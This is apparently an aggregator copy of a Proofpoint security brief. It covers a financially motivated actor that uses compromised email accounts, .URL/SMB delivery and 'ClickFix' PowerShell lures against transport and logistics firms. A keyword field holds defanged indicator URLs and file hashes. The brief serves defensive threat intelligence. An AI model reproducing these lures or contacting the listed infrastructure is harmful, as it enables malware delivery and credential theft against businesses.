One Article Review
| Source |  ProofPoint |
|---|---|
| Identifiant | 8583820 |
| Date de publication | 2024-09-24 12:09:32 (vue: 2024-09-24 13:17:14) |
| Titre | Mémoire de sécurité: L'acteur utilise des comptes compromis, une ingénierie sociale personnalisée pour cibler les entreprises de transport et de logistique avec des logiciels malveillants Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware |
| Texte | What happened Proofpoint researchers are tracking a cluster of activity targeting transportation and logistics companies in North America to deliver a variety of different malware payloads. Notably, this activity leverages compromised legitimate email accounts that belong to transportation and shipping companies. At this time, it is unclear how the actor achieves access to the compromised accounts. The actor then injects malicious content into existing conversations within the account\'s inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns. Researchers have been tracking this activity cluster since late May 2024. Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport. In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2. Most campaigns use messages with Google Drive URLs leading to an internet shortcut (.URL) file, or a .URL file attached directly to the message. If executed, it uses SMB to access an executable from the remote share, which installs the malware. Actor responds from a compromised account to a request within an ongoing thread. Actor using a compromised account to post a malicious link to an ongoing thread. Campaigns typically include less than 20 messages and impact a small number of customers, all in the same transport/logistics industries in North America. In August 2024, the actor also began using the “ClickFix” technique to deliver their malware. The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML, a technique called "ClickFix." The scripts led to an MSI file used to load DanaBot. Initial “ClickFix” dialogue box in which clicking the “Fix it” button copies a Base64 encoded PowerShell script. Final “ClickFix” dialogue box with instructions to open Windows PowerShell and paste and run the PowerShell script. While Proofpoint has observed this technique leveraged by other threat actors impersonating Word or Chrome updates, these campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management. Attribution Proofpoint does not currently attribute this activity cluster to an identified threat actor (TA). Similar techniques and infrastructure associated with ClickFix and the combination of Google Drive URLs, .URL files, and SMB have been observed used by other threat actors and campaigns. Proofpoint researchers assess that the threat actor discussed in this Security Brief is purchasing this infrastructure from third party providers. Based on the observed initial access activity, malware delivery, and infrastructure, Proofpoint assesses with moderate confidence the activity aligns with financially motivated, cybercriminal objectives. Why it matters Threat actors are increasingly tailoring lures to be more realistic to entice recipients to click on a link or download attachments. Compromising legitimate email accounts and sending malicious links and attachments to an existing email conversation achieves this goal and raises the risk that recipients will install malware. The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company\'s operations before sending campaigns. The language used in the lures and content also indicate familiarity with typical business workflows. This activity aligns with a trend Pro |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | 0050 01 03 05 06 0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2 10 12 14 14242 163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a 19 197 199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431 1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3 2024 217 22 24 2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319 25 32934 37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235 582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04 84/file/information 84/file/remittance 8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618 957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d 98/file/14242 98/file/carrier 98/file/rate 98/file/ratecon 98/file/rateconfirm ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e access account accounts achieves across activity actor actors adding aligns all also amb america analyst another are arechclient2 arechclient2 assess assesses associated astra attached attachments attack attribute attribution august authenticity b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86 base64 based been before began belong box boxes brief brief: business but button called campaigns carrier caution cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013 chain changed chrome click clickfix clickfix clicking cluster com/ com/3 com/astra/index com/fn com/true combination combined coming commodity companies company complex compromise compromised compromises compromising conducts confidence confirm confirmation contact contained content conversation conversations copies copy currently customers customized cybercriminal d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d danabot danabot deliver delivered delivery described description designed developing deviate dialogue different directed directly discussed does download drive during e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37 e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842 email emails employing encoded encountering engineering entice exe executable executed exercise existing f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f familiarity fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7 feel file file files final financially firms first fleet freight from general goal google happened has have how html html hxxp://185 hxxp://89 hxxp://ambcrrm hxxps://ambccm hxxps://ambcrrm hxxps://idessit hxxps://live identified impact impersonate impersonated impersonating inbox include increasingly indicate indicates indicator indicators industries industry information infrastructure initial injects install installs instructions internet it” july known landscape language late leading least led legitimate less leveraged leverages likely link links load logistic logistics look looking lumma lumma lumma lures makes malicious malware management matters may means members message messages moderate more most motivated msi msi netsupport new normal north not notably note: number objectives observed observed occurred off ongoing only open operations organizations other overlap package particularly party paste payload payloads post powershell predominately proofpoint providers purchasing raises rate ratecon rateconfirm rather realistic recipients related relying remittance remote request research researchers responds right risk run same samsara samsaratrucking script scripts security sender senders sending sense sets sha256 share shipping shortcut should since sixth small smb social software something sophisticated specific specifically stealc stealc stealc/netsupport stealc/netsupport stealer stealer such suspected tactics tailoring target tar |
| Tags | Malware Threat Prediction |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.